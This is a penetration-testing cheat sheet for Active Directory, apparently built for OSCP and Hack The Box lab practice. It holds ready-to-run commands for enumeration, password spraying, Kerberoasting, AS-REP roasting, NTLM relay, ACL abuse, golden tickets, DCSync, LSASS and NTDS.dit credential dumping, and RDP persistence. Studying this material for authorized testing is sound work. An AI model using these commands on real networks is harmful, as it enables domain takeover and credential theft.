LogJamπŸͺ΅

Basic Methodology

5 min read

0. Host Discovery

sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5

1. Network & Service Discovery

πŸ“Œ Identify open ports, services, and AD infrastructure.

πŸ› οΈ Tools: nmap, bloodhound, rpcclient, enum4linux, crackmapexec, kerbrute

βœ… Scan the network for AD-related services:

nmap -sV -A <target>
  • Get domain name
  • Identify interesting ports: 80, 20, 445, 3389, 5985 (not default, scan extra!)

βœ… List domain controllers and AD hosts:

crackmapexec smb <target>/24 --shares
nslookup -type=SRV _ldap._tcp.dc._msdcs.<DOMAIN>

βœ… Check for SMB Null Sessions (Anonymous Access)

smbclient -L //<IP> -N
enum4linux -a <IP>
  • If successful, check shared folders for credentials or configuration files.

2. User Enumeration

πŸ“Œ Find valid domain users for password attacks or Kerberoasting.

πŸ› οΈ Tools: kerbrute, rpcclient, ldapsearch, GetADUsers.py, smbclient

βœ… Enumerate Users via LDAP (if anonymous bind works)

ldapsearch -H ldap://DC20.oscp.exam -D 'g.jarvis@oscp.exam' -w Password123 -b 'dc=oscp,dc=exam' | grep "description:"

  • ➑️If works, windapsearch

    Windapsearch tool can be used to query the domain further:

    python3 /opt/windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U

    • ➑️➑️ If works, enumerate all objects

      Enumerate all objects in the AD:

      python3 /opt/windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
 
# Look for service accounts:
 
python3 /opt/windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*" | grep "svc-"
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local

βœ… Enumerate Users via SMB (if anonymous access is allowed)

rpcclient -U "" <IP>
enumdomusers
 
Filter:
cat unfiltered.txt | cut -d '[' -f2 | cut -d ']' -f1

βœ… Enumerate Users via Kerberos (User Guessing Attack)

Download: https://github.com/ropnop/kerbrute/releases/

  • Works good if you found some persons on the webserver somewhere
kerbrute userenum users.txt --dc dc01.inlanefreight.local -d inlanefreight.local

βœ… RID cycle

  • Rid Enum is a RID cycling attack that attempts to enumerate user accounts through null sessions and the SID to RID enum.
netexec smb 10.10.11.231 -u guest -p '' --rid-brute
 
or
 
/usr/share/doc/python3-impacket/examples/lookupsid.py -no-pass 'guest@rebound.htb' 20000
 
or grep only users
 
/usr/share/doc/python3-impacket/examples/lookupsid.py -no-pass 'guest@rebound.htb' 8000 | grep SidTypeUser | cut -d' ' -f2 | cut -d'\\' -f2 | tee users

3. Password Policy & Safe Spraying

πŸ“Œ Identify password policies to perform safe password spraying.

πŸ› οΈ Tools: crackmapexec, Get-ADDefaultDomainPasswordPolicy

βœ… Check password policy restrictions:

crackmapexec ldap <DC-IP> -u <user> -p <password> --pass-pol

βœ… Safe password spraying (check for locked accounts first!)

  • Works good if you found a password somewhere
  • Sometimes some users use their username as password!
sudo crackmapexec smb 192.168.110.55 -u userlist.txt -p 'P@ssw0rd' --continue-on-success

Or try local password spray:

crackmapexec winrm 192.168.176.96 -u users.txt -p 'New2Era4.!' --local-auth
awk '{print tolower($0)}' users.txt > passwords.txt
sudo crackmapexec smb 10.10.11.236 -u users.txt -p passwords.txt --continue-on-success

4. Credential Hunting (Low Hanging Fruits)

πŸ“Œ Find credentials in descriptions, GPP files, shared folders, etc.

πŸ› οΈ Tools: bloodhound-python, crackmapexec, secretsdump.py, smbclient

βœ… Check user descriptions for leaked passwords

ldapsearch -x -h <DC-IP> -b "DC=domain,DC=com" | grep -i "description"

βœ… Check Group Policy Preferences (GPP) for stored credentials

smbclient \\\\\\\\<DC-IP>\\\\SYSVOL -U <user>
  • Look for XML files in SYSVOL containing <cpassword>

βœ… Enumerate SMB Shares for stored passwords (do it for all machines!)

netexec smb -u -p --shares [--get-file \\\\<filename> <filename>]
 
smbclient -L //<DC-IP> -U <user>

Anonymous SMB check:

netexec smb <ip_range> -u '' -p ''

5. Common AD Attacks

5.1. Kerberoasting (If any users have SPN set)

πŸ“Œ Extract service accounts for offline cracking.

πŸ› οΈ Tools: GetUserSPNs.py, impacket

GetUserSPNs.py <DOMAIN>/<USER>:<PASSWORD> -dc-ip <DC-IP> -request
  • Need AD user credentials
  • Crack hashes using hashcat or john.

5.2. AS-REP Roasting (Users with Kerberos pre-authentication disabled)

πŸ“Œ Extract NTLM hashes of vulnerable users for offline cracking.

πŸ› οΈ Tools: GetNPUsers.py, hashcat

GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161

  • Works mostly for operation accounts

  • ➑️If works, crack the hash

    john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt

5.3. NTLM Relay Attacks

πŸ“Œ Intercept authentication requests and relay them to gain access.

πŸ› οΈ Tools: ntlmrelayx.py, Responder

sudo responder -I eth0
ntlmrelayx.py -tf targets.txt -smb2support

6. Privilege Escalation (From User to Admin)

πŸ“Œ Gain admin privileges through misconfigurations and ACL abuse.

πŸ› οΈ Tools: bloodhound, crackmapexec, seatbelt, winpeas

βœ… Run BloodHound to analyze attack paths

bloodhound-python -u svc-alfresco -p s3rvice -d htb.local -ns 10.10.10.161 -c All
  • Check for:
    • User with Delegation Rights
    • Users with WriteDACL privileges
    • GPO modifications
    • DCSync permissions

βœ… Look at your user in detail in AD context

Get-ADUser -identity s.smith -properties *
 
whoami /all
# Shows both local and AD groups

  • You might find something what is not visible in bloodhound

  • Pay attention on:

    • MemberOf
    • ScriptPath
    • Groups for local and AD escalation

  • ➑️If there is a logon script

    You can download it with SMB:

    smbclient \\\\\\\\10.10.10.182\\\\NETLOGON -U s.smith

βœ… Local Privilege Escalation

net user s.smith
  • Consider local way: file. local group. processes enumeration
  • Especially if you are already on the DC!

βœ… ACL Abuse (Modify User/Group Privileges)

  • If a user has WriteDACL on another user:
Set-ADUser -Identity victim -Replace @{memberOf="CN=Domain Admins,CN=Users,DC=domain,DC=com"}

βœ… Golden Ticket Attack (If krbtgt hash is obtained)

mimikatz
lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz
kerberos::golden /user:Administrator /domain:<domain> /sid:<SID> /krbtgt:<HASH>

7. Domain Administrator compromise

βœ… AllowToDelegate attack

Use Rubeus.exe to get Administrator’s/DC$ tgt and tgs, which enables DCSync

8. Post-Exploitation (Persistence & Exfiltration)

πŸ“Œ After gaining Domain Admin privileges, establish persistence.

πŸ› οΈ Tools: mimikatz, powerview, secretsdump.py

βœ… Dump all credentials from LSASS

mimikatz
sekurlsa::logonpasswords

βœ… Dump NTDS.dit (Full AD Credential Dump)

secretsdump.py -just-dc <DOMAIN>/<USER>@<DC-IP>

βœ… Enable RDP for future access

reg add "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /

Graph View